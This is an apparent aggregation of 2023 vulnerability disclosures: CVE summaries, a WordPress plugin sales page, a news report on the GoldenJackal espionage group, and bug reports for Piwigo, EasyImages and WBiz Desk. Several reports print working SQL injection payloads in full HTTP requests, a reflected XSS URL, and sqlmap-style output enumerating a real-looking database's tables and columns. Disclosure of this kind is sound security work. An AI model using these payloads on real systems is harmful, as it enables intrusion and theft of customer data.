A vulnerability was found in SourceCodester Theme Park Ticketing System 1.0. It has been classified as critical. This affects an unknown part of the file print_ticket.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229821 was assigned to this vulnerability.

CVE-2023-2865

A vulnerability was found in SourceCodester Online Jewelry Store 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file customer.php of the component POST Parameter Handler. The manipulation of the argument Custid leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-229820.

CVE-2023-2864

The Go Pricing - WordPress Responsive Pricing Tables plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'process_postdata' function in versions up to, and including, 3.3.19. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin to modify access to the plugin when it should only be the administrator's privilege.

****Go Pricing** Current Version 3.3.19 – June 18, 2021****Create amazing WordPress Pricing & Compare Tables**

It’s super easy to create WordPress pricing or compare tables with Go Pricing. If you buy this product, you won’t need anything else.

These WordPress Pricing Tables support various Media Elements like Audio, Video, Image or Map. Just give it a try! We are sure you will never use any other table plugin.

For more information please scroll down!

  
**Key Features**

**Easy to Use Admin Interface** – Edit your tables quickly and swiftly with our clean UI. There are help texts, colours, icons to help you in the efficient navigation.

**Various Media Types** – Make your tables more unique and engaging by adding content types like: Audio, Video or Map.

**Google Fonts** – Take full use of the complete Google font set and find the best matching one to your site.

**2000+ Font Icons** – Font Awesome, Icomoon, Linecon & Material Icons give you scalable vector icons that can be instantly customized, and they will look gorgeous on high-resolution displays.

**Live Preview** – This function will enable you to see how your will look Pricing Table in real time.

**Bulk Actions** – You can perform various operations on the dashboard with multiple tables, like: cloning, exporting, deleting.

**Column Animations** – Give some vibe to your tables! Choose any of the 39 amazing transitions for each and every column according to your taste.

**Customisable Responsivity** – Thanks to the various configuration options you can make sure that your table provides the best possible experience on any device.

**Import & Export functions** – You can swiftly import demo tables, create or restore backups, and move your data between sites.

**Built-in Plugin Update** – You can keep your installed version up to date and utilise all the latest fixes, features and improvements.

**Small Footprint** – You can ensure that the content is only loaded when it is necessary.

**Classic and Modern in one? Yes.**  
If you like traditional _WordPress Pricing Tables_, but you would like to get much more, then you are at the right place. You will get all the usual pricing table features, and our plugin also supports Videos (Youtube, Vimeo, Screenr) and Images optional responsivity. Enjoy this _easy and quick_ way of creating stunning tables, and integrating them into your existing WordPress site was never easier thanks to our Admin Panel. You will surely find the one from our ready made, but customizable demo tables that fits the best for you.

**What else can I do with Go Pricing Tables? We have some ideas.  
**Beside traditional _Pricing Tables_ features the plugin is suitable for creating Team Viewer and Compare Tables. These features can also be found in the package.

**Is the system flexible? Yes.  
**The responsivity is optional. It can be turned On and Off and customizable to adapt to your site or CSS framework (e.g. Bootstrap). You can use System or any Google Web Fonts (650+).

**Can I use more than one table on my site? Yes.**  
You can use any number of tables on your site, or even on one single page using shortcodes.

**Style & Layout**

*   Column Animation  
    *   Column Transition
    *   Price Counter
*   Text based ribbon (CSS)  
*   Unlimited colors and color combination of columns
*   Unlimited and different number of rows in Body and Footer
*   Any number of columns up to 10
*   Configurable column space and border radius
*   Standard and circle Header Styles
*   Advanced row and column height Equalization System
*   Numerous column shadow and sign options
*   Unlimited buttons in Body and Footer
*   Unique tooltip style
*   Paypal and s2Member button shortcode support
*   650+ Google Web Font
*   1900+ Font icons  
    *   Font Awesome
    *   Icomoon
    *   Linecon
    *   Material Icons
*   250+ Starter Template
    *   90+ Classic Style
    *   150+ Clean Style

**Responsivity**

*   Optional and customizable responsivity per tables
*   Configurable Breakpoints and number of columns

*   Responsive Images
*   Audio
    *   SoundCloud
    *   Mixcloud
    *   Beatport
    *   HTML5 audio
*   Video
    *   YouTube
    *   Vimeo
    *   Screenr
    *   Dailymotion
    *   Metacafe
    *   HTML5 video
*   Google Map – Classic, Clean and custom pins
*   Custom iFrame

**Modern user-friendly Admin Interface**

*   Optionally Ajaxified Admin
*   Help System
*   Advanced Table Dashboard
    *   Searching and Sorting possibilities
    *   Cloning and Deleting bulk actions
*   Update Notification and built-in Update functionality  
*   Visual Table Editor – Sort, Delete and Clone columns and rows
*   Advanced data Export and Import
*   Built-in Live Preview with responsivity settings
*   Visual Composer compatibility

**Supports the Latest Web Technologies**

*   Supports all modern browsers on the market
    *   Chrome
    *   Firefox
    *   Safari
    *   Opera
    *   Internet Explorer (9+)
*   Touch support for mobile devices, including iOS, Android, and Windows

**Other**

*   Layered PSDs for signs and pins
*   Translation ready with .mo .po files

**Quality & Originality**

Our goal is the best quality, however issues may occur which we try to fix quickly. We continuously monitor customer feedbacks and suggestions. Always use the latest version of this product.

  
**Changelog**

**v3.3.19 – June 18, 2021**

*   \[FIX\] PHP 7.4 compatibility issues fix in frontend
*   \[FIX\] Minor backend CSS fixes

**v3.3.18 – December 28, 2020**

*   \[FIX\] WordPress 5.6 compatibility issues fix in backend and frontend
*   \[FIX\] Minor frontend JavaScript fixes

**v3.3.17 – March 05, 2020**

*   \[IMPROVEMENT\] New tooltip position possibilities and automatic alignment on mobiles
*   \[FIX\] Fix for tooltip “cut-off” issue on mobiles

**v3.3.16 – November 14, 2019**

*   \[FIX\] WordPress 5.3 compatibility issue fix

**v3.3.15 – July 8, 2019**

*   \[IMPROVEMENT\] Minor improvements in PHP code
*   \[IMPROVEMENT\] Cornerstone Page Builder integration

**v3.3.14 – Jan 21, 2019**

*   \[FIX\] PHP 7+ Compatibility issue fix
*   \[IMPROVEMENT\] Minor CSS improvement in the frontend CSS

**v3.3.13 – Aug 16, 2018**

*   \[IMPROVEMENT\] Improved API caching to prevent slow down of the admin page loading if API is unavailable

We are frequently releasing new features and bufixes to the plugin, so it is strongly recommended to keep it up do date, to make sure that you utilise all the latest fixes, features and improvements!

**View our Changelog details**

CVE-2023-2494: Go Pricing - WordPress Responsive Pricing Tables

SourceCodester Employee and Visitor Gate Pass Logging System v1.0 is vulnerable to SQL Injection via /employee_gatepass/classes/Login.php.

**BUG\_Author:**

**ZongXin Li**

**Affected version:**

EMPLOYEE AND VISITOR GATE PASS LOGGING SYSTEM - 1.0

**Vendor:**

https://www.sourcecodester.com/users/tips23

**Software:**

https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html

**Vulnerability File:**

/employee\_gatepass/classes/Login.php

**Description:**

The system Employee and Visitor Gate Pass Logging 1.0 is vulnerable to SQL Injection via /employee\_gatepass/classes/Login.php. The parameter username is not sanitized correctly. The malicious actor can use this vulnerability to manipulate the administrator account of the systemand can take full control of the information about the other accounts. Status: CRITICAL

GET parameter 'username' exists SQL injection vulnerability

Payload1:username=admin' and (select 2 from (select(sleep(10)))x) and 'x'='x&password=admin123

    POST /employee_gatepass/classes/login.php?f=login HTTP/1.1
    Host: 127.0.0.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    
    username=admin' and (select 2 from (select(sleep(10)))x) and 'x'='x&password=admin123
    

The server's response time is 10 seconds

Payload2:username=admin'and left(version(),6)='5.7.27' AND 'ledo'='ledo&password=admin123

    POST /employee_gatepass/classes/login.php?f=login HTTP/1.1
    Host: 127.0.0.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    
    username=admin'and left(version(),6)='5.7.26' AND 'ledo'='ledo&password=admin123
    

Error injection success

When I enter the version number 5.7.26, it returns "success". Error statement when typing 5.7.27

CVE-2023-31752: bug_report/SQLi-2.md at main · 4O4NtFd/bug_report

Government and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named GoldenJackal.
Russian cybersecurity firm Kaspersky, which has been keeping tabs on the group's activities since mid-2020, characterized the adversary as both capable and stealthy.
The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq,

Government and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named **GoldenJackal**.

Russian cybersecurity firm Kaspersky, which has been keeping tabs on the group's activities since mid-2020, characterized the adversary as both capable and stealthy.

The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance.

GoldenJackal is suspected to have been active for at least four years, although little is known about the group. Kaspersky said it has been unable to determine its origin or affiliation with known threat actors, but the actor's modus operandi suggests an espionage motivation.

What's more, the threat actor's attempts to maintain a low profile and disappear into the shadows bears all the hallmarks of a state-sponsored group.

That said, some tactical overlaps have been observed between the threat actor and Turla, one of Russia's elite nation-state hacking crews. In one stance, a victim machine was infected by Turla and GoldenJackal two months apart.

The exact initial path employed to breach targeted computers is unknown at this stage, but evidence gathered so far points to the use of trojanized Skype installers and malicious Microsoft Word documents.

While the installer serves as a conduit to deliver a .NET-based trojan called JackalControl, the Word files have been observed weaponizing the Follina vulnerability (CVE-2022-30190) to drop the same malware.

JackalControl, as the name indicates, enables the attackers to remotely commandeer the machine, execute arbitrary commands, as well as upload and download from and to the system.

Geography of victims

Some of the other malware families deployed by GoldenJackal are as follows -

*   **JackalSteal** - An implant that's used to find files of interest, including those located in removable USB drives, and transmit them to a remote server.
*   **JackalWorm** - A worm that's engineered to infect systems using removable USB drives and install the JackalControl trojan.
*   **JackalPerInfo** - A malware that comes with features to harvest system metadata, folder contents, installed applications, and running processes, and credentials stored in web browser databases.
*   **JackalScreenWatcher** - A utility to grab screenshots based on a preset time interval and send them to an actor-controlled server.

Another notable aspect of the threat actor is its reliance on hacked WordPress sites as a relay to forward web requests to the actual command-and-control (C2) server by means of a rogue PHP file injected into the websites.

"The group is probably trying to reduce its visibility by limiting the number of victims," Kaspersky researcher Giampaolo Dedola said. "Their toolkit seems to be under development – the number of variants shows that they are still investing in it."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GoldenJackal: New Threat Group Targeting Middle Eastern and South Asian Governments

EasyImages2.0 ? 2.8.1 is vulnerable to Cross Site Scripting (XSS) via viewlog.php.

**EasyImages2.0 Cross-site scripting(xss) vulnerability****Impact version**

EasyImages2.0 ≤ 2.8.1

**Analysis Report****Vulnerability file**

/app/viewlog.php

When displaying logs, the file directly outputs the log content to the front-end page without taking any preventive measures

**Vulnerability exploitation**

1.Use the JS script for the user parameter on the login page  
  

2.The malicious code is triggered when the admin user views the login log  

**Fixes**

Filter special characters when displaying logs

CVE-2023-33599: EasyImages2.0 Cross-site scripting(xss) vulnerability · Issue #115 · icret/EasyImages2.0

Piwigo 13.6.0 is vulnerable to SQL Injection via /admin/permalinks.php.

Before replicating this vulnerability, you need to first create a new album and access the "photos\_add" function, and choose to create a new album  
  
//like this  

Then,accessing permalinks functionality  

click this  

Select the album you just created and use 'burp' to intercept this request  

You can see this' cat\_id 'parameter, which is where SQL injection exists  

We are trying to add a single quotation mark to trigger an error in MySQL  

We can also directly try using the sleep () function to trigger a delay  

It is not difficult to find that there is an SQL injection here. Next, we will analyze this problem from the code level.  
The vulnerability arises from '/admin/permalinks.php'  
//Start Here  

In our data package, we passed in the "set\_permalink" and “cat\_ Id"parameter, and "cat\_id"is greater than 0, so we can enter this if branch  

Then, because we passed in the 'permalink' parameter, we actually entered the internal else branch  

Then we try to analyze the set\_cat\_permalink() function.（In /admin/include/functions\_permalinks.php）  

In the end, we can find this SQL statement, where '$cat\_id' is passed directly into the SQL statement without any filtering.It is precisely this location that caused SQL injection  

This vulnerability exists in version 13.6.0, and it is uncertain whether this issue exists in earlier versions

CVE-2023-33361: There is a SQL Injection in the "permalinks" function of piwigo · Issue #1910 · Piwigo/Piwigo

Piwigo 13.6.0 is vulnerable to SQL Injection via in the "profile" function.

Accessing the 'profile' page  

Add the 'user\_id' parameter with single quotes  

Discovering an error in MySQL can actually prove the existence of SQL injection, but we can still try using the sleep() function for testing  
  

//Try to analyze how this vulnerability was generated from a code level perspective.  

First find '/admin/profile.php'  

Track build\_user() function (in the /Piwigo/include/functions\_user.inc.php)  

The '$user\_id' enters the getuserdata() function, so continue tracking getuserdata()  

Finally, the '$user\_id' variable will enter this string of SQL statements, which clearly does not filter the incoming parameter values, resulting in SQL injection  

This vulnerability affects the latest version up to 13.6.0, and it is uncertain whether other versions will be affected.

CVE-2023-33362: There is a SQL Injection in the "profile" function of piwigo · Issue #1911 · Piwigo/Piwigo

WBiz Desk version 1.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/5641/                                       ││  Vendor   : WeBiz Digital                                                              ││  Software : WBiz Desk 1.2                                                              ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /ticket.phpGET parameter 'tk' is vulnerable to RXSShttp://website/ticket.php?tk=d92h8"><script>alert(1)</script>ygwfb[-] Done

WBiz Desk 1.2 Cross Site Scripting

WBiz Desk version 1.2 suffers from a remote SQL injection vulnerability in the idtk parameter. This is a variant finding from the original discovery of SQL injection in this version attributed to h4ck3r in May of 2023.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/5641/                                       ││  Vendor   : WeBiz Digital                                                              ││  Software : WBiz Desk 1.2                                                              ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /ticket.phphttp://website/ticket.php?tk=1&idtk=[SQLi]&action=closeGET parameter 'idtk' is vulnerable to SQL Injection---Parameter: idtk (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: tk=1&idtk=1' RLIKE (SELECT (CASE WHEN (8547=8547) THEN 1 ELSE 0x28 END))-- KUTf&action=close    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: tk=1&idtk=1' OR (SELECT 3964 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(3964=3964,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- kned&action=close    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: tk=1&idtk=1' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))OGEN)-- uSzC&action=close---[+] Starting the Attackfetching current databasecurrent database: 'wbizdesk_*****_com_br'fetching tables[12 tables]+----------------+| accounts       || category       || chat           || config         || customers      || departments    || email_template || log_tb         || messages       || tickets        || tutorial       || users          |+----------------+fetching columns for table 'customers'[19 columns]+--------------+-------------------+| Column       | Type              |+--------------+-------------------+| name         | varchar(160)      || number       | varchar(11)       || status       | enum('S','B','N') || address      | varchar(255)      || city         | varchar(160)      || company      | varchar(160)      || country      | varchar(60)       || cpf_cnpj     | varchar(60)       || email        | varchar(255)      || id           | int(11)           || ip           | varchar(90)       || neighborhood | varchar(160)      || obs          | text              || os           | varchar(160)      || pass         | varchar(160)      || phrase       | varchar(160)      || salt         | varchar(255)      || state        | varchar(160)      || zipcode      | varchar(60)       |+--------------+-------------------+[-] Done

Tag

#php